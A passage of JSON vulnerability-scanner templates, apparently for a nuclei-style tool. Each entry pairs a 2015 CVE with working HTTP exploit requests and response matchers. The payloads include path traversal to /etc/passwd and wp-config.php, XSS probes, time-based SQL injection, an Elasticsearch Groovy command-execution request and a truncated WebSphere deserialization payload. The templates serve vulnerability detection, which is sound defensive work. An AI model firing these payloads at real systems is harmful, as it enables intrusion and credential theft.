- Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wlsecurity.html"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var wpapskkey","var WscDevPin","var sessionkey"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-3224","info":{"name":"Ruby on Rails Web Console - Remote Code Execution","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/{{randstr}}"],"headers":{"X-Forwarded-For":"::1"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Rails.root:","Action Controller: Exception caught"],"condition":"and"},{"type":"word","part":"response","words":["X-Web-Console-Session-Id","data-remote-path=","data-session-id="],"case-insensitive":true,"condition":"or"}]}]},{"id":"CVE-2015-2755","info":{"name":"WordPress AB Google Map Travel <=3.4 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 10s\nPOST /wp-admin/admin.php?page=ab_map_options HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlat=%22%3E+%3Cscript%3E%2B-%2B-1-%2B-%2Balert%28document.domain%29%3C%2Fscript%3E&long=76.26730&lang=en&map_width=500&map_height=300&zoom=7&day_less_five_fare=2&day_more_five_fare=1.5&less_five_fare=3&more_five_fare=2.5&curr_format=%24&submit=Update+Settings\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>+-+-1-+-+alert(document.domain)</script>\")","contains(body_2, \"ab-google-map-travel\")"],"condition":"and"}]}]},{"id":"CVE-2015-8399","info":{"name":"Atlassian Confluence <5.8.17 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/spaces/viewdefaultdecorator.action?decoratorName"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["confluence-init.properties","View Default Decorator"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-3035","info":{"name":"TP-LINK - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/login/../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-9312","info":{"name":"NewStatPress <=1.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?groupby1=checked%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29&page=nsp_search&newstatpress_action=search HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<img src=x onerror=alert(document.domain)\")","contains(body_2, \"newstatpress\")"],"condition":"and"}]}]},{"id":"CVE-2015-3897","info":{"name":"Bonita BPM Portal <6.5.3 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=etc/passwd","{{BaseURL}}/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=Windows/win.ini"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"regex","regex":["root:[x*]:0:0:"]}]}]},{"id":"CVE-2015-5531","info":{"name":"ElasticSearch <1.6.1 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["PUT /_snapshot/test HTTP/1.1\nHost: {{Hostname}}\n\n{\n    \"type\": \"fs\",\n    \"settings\": {\n        \"location\": \"/usr/share/elasticsearch/repo/test\"\n    }\n}\n","PUT /_snapshot/test2 HTTP/1.1\nHost: {{Hostname}}\n\n{\n    \"type\": \"fs\",\n    \"settings\": {\n        \"location\": \"/usr/share/elasticsearch/repo/test/snapshot-backdata\"\n    }\n}\n","GET /_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd  HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ElasticsearchParseException","Failed to derive xcontent from","114, 111, 111, 116, 58"],"condition":"and"},{"type":"status","status":[400]}]}]},{"id":"CVE-2015-4668","info":{"name":"Xsuite <=2.4.4.5 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/openwin.php?redirurl=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2015-4694","info":{"name":"WordPress Zip Attachments <= 1.1.4 - Arbitrary File Retrieval","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-5469","info":{"name":"WordPress MDC YouTube Downloader 2.1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4414","info":{"name":"WordPress SE HTML5 Album Audio Player 1.1.0 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-5688","info":{"name":"Geddy <13.0.8 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4074","info":{"name":"Joomla! Helpdesk Pro plugin <1.4.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?option=com_helpdeskpro&task=ticket.download_attachment&filename=/../../../../../../../../../../../../etc/passwd&original_filename=AnyFileName.exe"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-6544","info":{"name":"Combodo iTop <2.2.0-2459 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pages/ajax.render.php?operation=render_dashboard&dashboard_id=1&layout_class=DashboardLayoutOneCol&title=%%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-9414","info":{"name":"WordPress Symposium <=15.8.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-symposium/get_album_item.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-7245","info":{"name":"D-Link DVG-N5402SP - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /cgibin/webproc HTTP/1.1\nHost: {{Hostname}}\n\ngetpage=html%2Findex.html&*errorpage*=../../../../../../../../../../../etc/passwd&var%3Amenu=setup&var%3Apage=connected&var%&objaction=auth&%3Ausername=blah&%3Apassword=blah&%3Aaction=login&%3Asessionid=abcdefgh\n"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2015-4062","info":{"name":"WordPress NewStatPress 0.9.8 - SQL Injection","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?where1=1+AND+(SELECT+3066+FROM+(SELECT(SLEEP(6)))CEHy)&limitquery=1&searchsubmit=Buscar&page=nsp_search HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body_2, \"newstatpress_page_nsp_search\")"],"condition":"and"}]}]},{"id":"CVE-2015-4127","info":{"name":"WordPress Church Admin <0.810 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4632","info":{"name":"Koha 3.20.1 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-3648","info":{"name":"ResourceSpace - Local File inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-9480","info":{"name":"WordPress RobotCPA 5 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-1427","info":{"name":"ElasticSearch - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /website/blog/ HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Language: en\nContent-Type: application/x-www-form-urlencoded\n\n{\n  \"name\": \"test\"\n}\n","POST /_search HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\n{\"size\":1, \"script_fields\": {\"lupin\":{\"lang\":\"groovy\",\"script\": \"java.lang.Math.class.forName(\\\"java.lang.Runtime\\\").getRuntime().exec(\\\"cat /etc/passwd\\\").getText()\"}}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-5461","info":{"name":"WordPress StageShow <5.0.9 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2Finteract.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2015-7377","info":{"name":"WordPress Pie-Register <2.0.19 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?page=pie-register&show_dash_widget=1&invitaion_code=PC9zY3JpcHQ+PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-7297","info":{"name":"Joomla! Core SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5({{num}})),1)"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2015-8813","info":{"name":"Umbraco <7.4.0- Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/Umbraco/feedproxy.aspx?url=http://{{interactsh-url}}"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2015-2166","info":{"name":"Ericsson Drutt MSDP - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-5471","info":{"name":"Swim Team <= v1.44.10777 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-1880","info":{"name":"Fortinet FortiOS <=5.2.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/remote/login?&err=--%3E%3Cscript%3Ealert('{{randstr}}')%3C/script%3E%3C!--&lang=en"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert('{{randstr}}')</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-2863","info":{"name":"Kaseya Virtual System Administrator - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/inc/supportLoad.asp?urlToLoad=http://oast.me","{{BaseURL}}/vsaPres/Web20/core/LocalProxy.ashx?url=http://oast.me"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2015-1579","info":{"name":"WordPress Slider Revolution - Local File Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php","{{BaseURL}}/blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'DB_NAME'","'DB_PASSWORD'","'DB_USER'"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-7780","info":{"name":"ManageEngine Firewall Analyzer <8.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/fw/mindex.do?url=./WEB-INF/web.xml%3f"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</web-app>","java.sun.com"],"condition":"and"},{"type":"word","part":"header","words":["application/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-5354","info":{"name":"Novius OS 5.0.1-elche - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/novius-os/admin/nos/login?redirect=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2015-6920","info":{"name":"WordPress sourceAFRICA <=0.1.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/sourceafrica/js/window.php?wpbase=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-9323","info":{"name":"404 to 301 <= 2.0.2 - Authenticated Blind SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 15s\nGET /wp-admin/admin.php?page=i4t3-logs&orderby=(SELECT+*+FROM+(SELECT+SLEEP(5))XXX)--+- HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration>=5","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"404-to-301\")"],"condition":"and"}]}]},{"id":"CVE-2015-6477","info":{"name":"Nordex NC2  - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/login"],"body":"connection=basic&userName=admin%27%22%29%3B%7D%3C%2Fscript%3E%3Cscript%3Ealert%28%27{{randstr}}%27%29%3C%2Fscript%3E&pw=nordex&language=en","matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["</script><script>alert('{{randstr}}')</script>"]}]}]},{"id":"CVE-2015-2996","info":{"name":"SysAid Help Desk <15.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/sysaid/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd","{{BaseURL}}/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-8349","info":{"name":"SourceBans <2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?p=banlist&advSearch=0%27%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&advType=btype"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-2080","info":{"name":"Eclipse Jetty <9.2.9.v20150224 - Sensitive Information Leakage","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}"],"headers":{"Referer":"\\x00"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Illegal character 0x0 in state"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2015-3337","info":{"name":"Elasticsearch - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/_plugin/head/../../../../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-2807","info":{"name":"Navis DocumentCloud <0.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-1000010","info":{"name":"WordPress Simple Image Manipulator < 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-2067","info":{"name":"Magento Server MAGMI - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4050","info":{"name":"Symfony - Authentication Bypass","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/_fragment?_path=_controller=phpcredits&flag=-1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["PHP Credits"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-1000005","info":{"name":"WordPress Candidate Application Form <= 1.3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-7450","info":{"name":"IBM WebSphere Java Object Deserialization - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml; charset=utf-8\nSOAPAction: \"urn:AdminService\"\n\n<?xml version='1.0' encoding='UTF-8'?>\n<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\">\n<SOAP-ENV:Header ns0:JMXConnectorContext=\"rO0ABXNyAA9qYXZhLnV0aWwuU3RhY2sQ/irCuwmGHQIAAHhyABBqYXZhLnV0aWwuVmVjdG9y2Zd9W4A7rwEDAANJABFjYXBhY2l0eUluY3JlbWVudEkADGVsZW1lbnRDb3VudFsAC2VsZW1lbnREYXRhdAATW0xqYXZhL2xhbmcvT2JqZWN0O3hwAAAAAAAAAAF1cgATW0xqYXZhLmxhbmcuT2JqZWN0O5DOWJ8QcylsAgAAeHAAAAAKc3IAOmNvbS5pYm0ud3MubWFuYWdlbWVudC5jb25uZWN0b3IuSk1YQ29ubmVjdG9yQ29udGV4dEVsZW1lbnTblRMyYyF8sQIABUwACGNlbGxOYW1ldAASTGphdmEvbGFuZy9TdHJpbmc7TAAIaG9zdE5hbWVxAH4AB0wACG5vZGVOYW1lcQB+AAdMAApzZXJ2ZXJOYW1lcQB+AAdbAApzdGFja1RyYWNldAAeW0xqYXZhL2xhbmcvU3RhY2tUcmFjZUVsZW1lbnQ7eHB0AAB0AAhMYXAzOTAxM3EAfgAKcQB+AAp1cgAeW0xqYXZhLmxhbmcuU3RhY2tUcmFjZUVsZW1lbnQ7AkYqPDz9IjkCAAB4cAAAACpzcgAbamF2YS5sYW5nLlN0YWNrVHJhY2VFbGVtZW50YQnFmiY23YUCAARJAApsaW5lTnVtYmVyTAAOZGVjbGFyaW5nQ2xhc3NxAH4AB0wACGZpbGVOYW1lcQB+AAdMAAptZXRob2ROYW1lcQB+AAd4cAAAAEt0ADpjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLkpNWENvbm5lY3RvckNvbnRleHRFbGVtZW50dAAfSk1YQ29ubmVjdG9yQ29udGV4dEVsZW1lbnQuamF2YXQABjxpbml0PnNxAH4ADgAAADx0ADNjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLkpNWENvbm5lY3RvckNvbnRleHR0ABhKTVhDb25uZWN0b3JDb250ZXh0LmphdmF0AARwdXNoc3EAfgAOAAAGQ3QAOGNvbS5pYm0ud3MubWFuYWdlbWVudC5jb25uZWN0b3Iuc29hcC5TT0FQQ29ubmVjdG9yQ2xpZW50dAAYU09BUENvbm5lY3RvckNsaWVudC5qYXZhdAAcZ2V0Sk1YQ29ubmVjdG9yQ29udGV4dEhlYWRlcnNxAH4ADgAAA0h0ADhjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLnNvYXAuU09BUENvbm5lY3RvckNsaWVudHQAGFNPQVBDb25uZWN0b3JDbGllbnQuamF2YXQAEmludm9rZVRlbXBsYXRlT25jZXNxAH4ADgAAArF0ADhjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLnNvYXAuU09BUENvbm5lY3RvckNsaWVudHQAGFNPQVBDb25uZWN0b3JDbGllbnQuamF2YXQADmludm9rZVRlbXBsYXRlc3EAfgAOAAACp3QAOGNvbS5pYm0ud3MubWFuYWdlbWVudC5jb25uZWN0b3Iuc29hcC5TT0FQQ29ubmVjdG9yQ2xpZW50dAAYU09BUENvbm5lY3RvckNsaWVudC5qYXZhdAAOaW52b2tlVGVtcGxhdGVzcQB+AA4AAAKZdAA4Y29tLmlibS53cy5tYW5hZ2VtZW50LmNvbm5lY3Rvci5zb2FwLlNPQVBDb25uZWN0b3JDbGllbnR0ABhTT0FQQ29ubmVjdG9yQ2xpZW50LmphdmF0AAZpbnZva2VzcQB+AA4AAAHndAA4Y29tLmlibS53cy5tYW5hZ2VtZW50LmNvbm5lY3Rvci5zb2FwLlNPQVBDb25uZWN0b3JDbGllbnR0ABhTT0FQQ29ubmVjdG9yQ2xpZW50LmphdmF0AAZpbnZva2VzcQB+AA7/////dAAVY29tLnN1bi5wcm94eS4kUHJveHkwcHQABmludm9rZXNxAH4ADgAAAOB0ACVjb20uaWJtLndzLm1hbmFnZW1lbnQuQWRtaW5DbGllbnRJbXBsdAAUQWRtaW5DbGllbnRJbXBsLmphdmF0AAZpbnZva2VzcQB+AA4AAADYdAA9Y29tLmlibS53ZWJzcGhlcmUubWFuYWdlbWVudC5jb25maWdzZXJ2aWNlLkNvbmZpZ1NlcnZpY2VQcm94eXQAF0NvbmZpZ1NlcnZpY2VQcm94eS5qYXZhdAARZ2V0VW5zYXZlZENoYW5nZXNzcQB+AA4AAAwYdAAmY29tLmlibS53cy5zY3JpcHRpbmcuQWRtaW5Db25maWdDbGllbnR0ABZBZG1pbkNvbmZpZ0NsaWVudC5qYXZhdAAKaGFzQ2hhbmdlc3NxAH4ADgAAA/Z0AB5jb20uaWJtLndzLnNjcmlwdGluZy5XYXN4U2hlbGx0AA5XYXN4U2hlbGwuamF2YXQACHRpbWVUb0dvc3EAfgAOAAAFm3QAImNvbS5pYm0ud3Muc2NyaXB0aW5nLkFic3RyYWN0U2hlbGx0ABJBYnN0cmFjdFNoZWxsLmphdmF0AAtpbnRlcmFjdGl2ZXNxAH4ADgAACPp0ACJjb20uaWJtLndzLnNjcmlwdGluZy5BYnN0cmFjdFNoZWxsdAASQWJzdHJhY3RTaGVsbC5qYXZhdAADcnVuc3EAfgAOAAAElHQAHmNvbS5pYm0ud3Muc2NyaXB0aW5nLldhc3hTaGVsbHQADldhc3hTaGVsbC5qYXZhdAAEbWFpbnNxAH4ADv////50ACRzdW4ucmVmbGVjdC5OYXRpdmVNZXRob2RBY2Nlc3NvckltcGx0AB1OYXRpdmVNZXRob2RBY2Nlc3NvckltcGwuamF2YXQAB2ludm9rZTBzcQB+AA4AAAA8dAAkc3VuLnJlZmxlY3QuTmF0aXZlTWV0aG9kQWNjZXNzb3JJbXBsdAAdTmF0aXZlTWV0aG9kQWNjZXNzb3JJbXBsLmphdmF0AAZpbnZva2VzcQB+AA4AAAAldAAoc3VuLnJlZmxlY3QuRGVsZWdhdGluZ01ldGhvZEFjY2Vzc29ySW1wbHQAIURlbGVnYXRpbmdNZXRob2RBY2Nlc3NvckltcGwuamF2YXQABmludm9rZXNxAH4ADgAAAmN0ABhqYXZhLmxhbmcucmVmbGVjdC5NZXRob2R0AAtNZXRob2QuamF2YXQABmludm9rZXNxAH4ADgAAAOp0ACJjb20uaWJtLndzc3BpLmJvb3RzdHJhcC5XU0xhdW5jaGVydAAPV1NMYXVuY2hlci5qYXZhdAAKbGF1bmNoTWFpbnNxAH4ADgAAAGB0ACJjb20uaWJtLndzc3BpLmJvb3RzdHJhcC5XU0xhdW5jaGVydAAPV1NMYXVuY2hlci5qYXZhdAAEbWFpbnNxAH4ADgAAAE10ACJjb20uaWJtLndzc3BpLmJvb3RzdHJhcC5XU0xhdW5jaGVydAAPV1NMYXVuY2hlci5qYXZhdAADcnVuc3EAfgAO/////nQAJHN1bi5yZWZsZWN0Lk5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbHQAHU5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAHaW52b2tlMHNxAH4ADgAAADx0ACRzdW4ucmVmbGVjdC5OYXRpdmVNZXRob2RBY2Nlc3NvckltcGx0AB1OYXRpdmVNZXRob2RBY2Nlc3NvckltcGwuamF2YXQABmludm9rZXNxAH4ADgAAACV0AChzdW4ucmVmbGVjdC5EZWxlZ2F0aW5nTWV0aG9kQWNjZXNzb3JJbXBsdAAhRGVsZWdhdGluZ01ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAGaW52b2tlc3EAfgAOAAACY3QAGGphdmEubGFuZy5yZWZsZWN0Lk1